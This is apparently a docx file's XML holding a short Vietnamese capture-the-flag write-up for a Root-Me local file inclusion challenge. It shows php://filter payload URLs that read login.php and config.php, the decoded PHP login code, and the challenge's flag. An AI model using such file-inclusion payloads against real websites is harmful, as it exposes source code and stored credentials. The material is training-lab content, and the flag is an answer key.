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B191" w14:textId="508B3F49" w:rsidR="00865D5E" w:rsidRDefault="00865D5E">
      <w:r>
        <w:t>Đầu tiên vào thì thấy trang web</w:t>
      </w:r>
      <w:r w:rsidR="00213353">
        <w:t xml:space="preserve"> thấy url không được filter ta sẽ truyền payload vào</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D4911F" w14:textId="284C344C" w:rsidR="00213353" w:rsidRDefault="00213353">
      <w:r w:rsidRPr="00213353">
        <w:t>http://challenge01.root-me.org/web-serveur/ch12/?inc=php://filter/convert.base64-encode/resource=login.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A0A1A0" w14:textId="278462D8" w:rsidR="00C54FA4" w:rsidRDefault="00865D5E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53064E4F" wp14:editId="5AE2EDF9">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="214328063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8063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549" w14:textId="1A584A40" w:rsidR="00213353" w:rsidRDefault="00213353">
      <w:r>
        <w:t>Tiếp tục decode ta thấy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44238DB6" w14:textId="77777777" w:rsidR="00213353" w:rsidRDefault="00213353" w:rsidP="00213353">
      <w:r>
        <w:t>&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23004EC5" w14:textId="77777777" w:rsidR="00213353" w:rsidRDefault="00213353" w:rsidP="00213353">
      <w:r>
        <w:t>include("config.php");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DDA9243" w14:textId="77777777" w:rsidR="00213353" w:rsidRDefault="00213353" w:rsidP="00213353"/>
    <w:p w14:paraId="252A051C" w14:textId="77777777" w:rsidR="00213353" w:rsidRDefault="00213353" w:rsidP="00213353">
      <w:r>
        <w:t>if ( isset($_POST["username"]) &amp;&amp; isset($_POST["password"]) ){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5812C4CF" w14:textId="77777777" w:rsidR="00213353" w:rsidRDefault="00213353" w:rsidP="00213353">
      <w:r>
        <w:t xml:space="preserve">    if ($_POST["username"]==$username &amp;&amp; $_POST["password"]==$password){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63151788" w14:textId="77777777" w:rsidR="00213353" w:rsidRDefault="00213353" w:rsidP="00213353">
      <w:r>
        <w:t xml:space="preserve">      print("&lt;h2&gt;Welcome back !&lt;/h2&gt;");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B34B08C" w14:textId="77777777" w:rsidR="00213353" w:rsidRDefault="00213353" w:rsidP="00213353">
      <w:r>
        <w:t xml:space="preserve">      print("To validate the challenge use this password&lt;br/&gt;&lt;br/&gt;");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F65B32A" w14:textId="77777777" w:rsidR="00213353" w:rsidRDefault="00213353" w:rsidP="00213353">
      <w:r>
        <w:t xml:space="preserve">    } else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9736F7" w14:textId="77777777" w:rsidR="00213353" w:rsidRDefault="00213353" w:rsidP="00213353">
      <w:r>
        <w:t xml:space="preserve">      print("&lt;h3&gt;Error : no such user/password&lt;/h2&gt;&lt;br /&gt;");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63245A00" w14:textId="77777777" w:rsidR="00213353" w:rsidRDefault="00213353" w:rsidP="00213353">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049D9BA7" w14:textId="77777777" w:rsidR="00213353" w:rsidRDefault="00213353" w:rsidP="00213353">
      <w:r>
        <w:t>} else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D690D7E" w14:textId="77777777" w:rsidR="00213353" w:rsidRDefault="00213353" w:rsidP="00213353">
      <w:r>
        <w:t>?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32375A9D" w14:textId="77777777" w:rsidR="00213353" w:rsidRDefault="00213353" w:rsidP="00213353"/>
    <w:p w14:paraId="109C0996" w14:textId="77777777" w:rsidR="00213353" w:rsidRDefault="00213353" w:rsidP="00213353">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&lt;form action="" method="post"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D287D15" w14:textId="77777777" w:rsidR="00213353" w:rsidRDefault="00213353" w:rsidP="00213353">
      <w:r>
        <w:t xml:space="preserve">  Login&amp;nbsp;&lt;br/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2553744F" w14:textId="77777777" w:rsidR="00213353" w:rsidRDefault="00213353" w:rsidP="00213353">
      <w:r>
        <w:t xml:space="preserve">  &lt;input type="text" name="username" /&gt;&lt;br/&gt;&lt;br/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA1C0D6" w14:textId="77777777" w:rsidR="00213353" w:rsidRDefault="00213353" w:rsidP="00213353">
      <w:r>
        <w:t xml:space="preserve">  Password&amp;nbsp;&lt;br/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116F85D2" w14:textId="77777777" w:rsidR="00213353" w:rsidRDefault="00213353" w:rsidP="00213353">
      <w:r>
        <w:t xml:space="preserve">  &lt;input type="password" name="password" /&gt;&lt;br/&gt;&lt;br/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6D85FA" w14:textId="77777777" w:rsidR="00213353" w:rsidRDefault="00213353" w:rsidP="00213353">
      <w:r>
        <w:t xml:space="preserve">  &lt;br/&gt;&lt;br/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB9CCF8" w14:textId="77777777" w:rsidR="00213353" w:rsidRDefault="00213353" w:rsidP="00213353">
      <w:r>
        <w:t xml:space="preserve">  &lt;input type="submit" value="connect" /&gt;&lt;br/&gt;&lt;br/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F91764" w14:textId="77777777" w:rsidR="00213353" w:rsidRDefault="00213353" w:rsidP="00213353">
      <w:r>
        <w:t>&lt;/form&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7303343D" w14:textId="77777777" w:rsidR="00213353" w:rsidRDefault="00213353" w:rsidP="00213353"/>
    <w:p w14:paraId="568A9DB9" w14:textId="5CF7EAFD" w:rsidR="00213353" w:rsidRDefault="00213353" w:rsidP="00213353">
      <w:r>
        <w:t>&lt;?php } ?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D757392" w14:textId="12FF560D" w:rsidR="00213353" w:rsidRDefault="00213353" w:rsidP="00213353">
      <w:r>
        <w:t>Tiếp tục truyền payload này ta sẽ thấy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255381A0" w14:textId="296AC1C6" w:rsidR="00213353" w:rsidRDefault="00213353" w:rsidP="00213353">
      <w:r w:rsidRPr="00213353">
        <w:t>http://challenge01.root-me.org/web-serveur/ch12/?inc=php://filter/convert.base64-encode/resource=config.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33314822" w14:textId="210F55CF" w:rsidR="00213353" w:rsidRDefault="00213353" w:rsidP="00213353">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="645BB552" wp14:editId="3BE7CF19">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="165920616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6160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9324" w14:textId="28970B57" w:rsidR="00213353" w:rsidRDefault="00BD43FB" w:rsidP="00213353">
      <w:r>
        <w:t>Và ta có flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535C9DA0" w14:textId="56677494" w:rsidR="00213353" w:rsidRDefault="00213353" w:rsidP="00213353">
      <w:r w:rsidRPr="00213353">
        <w:t>DAPt9D2mky0APAF</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="0021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F0"/>
    <w:rsid w:val="00213353"/>
    <w:rsid w:val="006506F0"/>
    <w:rsid w:val="00865D5E"/>
    <w:rsid w:val="00BD43FB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48C4"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{A353B8EC-4D7F-4AC6-AB25-D30862D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2023-04-15T17:57:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-04-15T18:10:00Z</dcterms:modified>
</cp:coreProperties>
</file>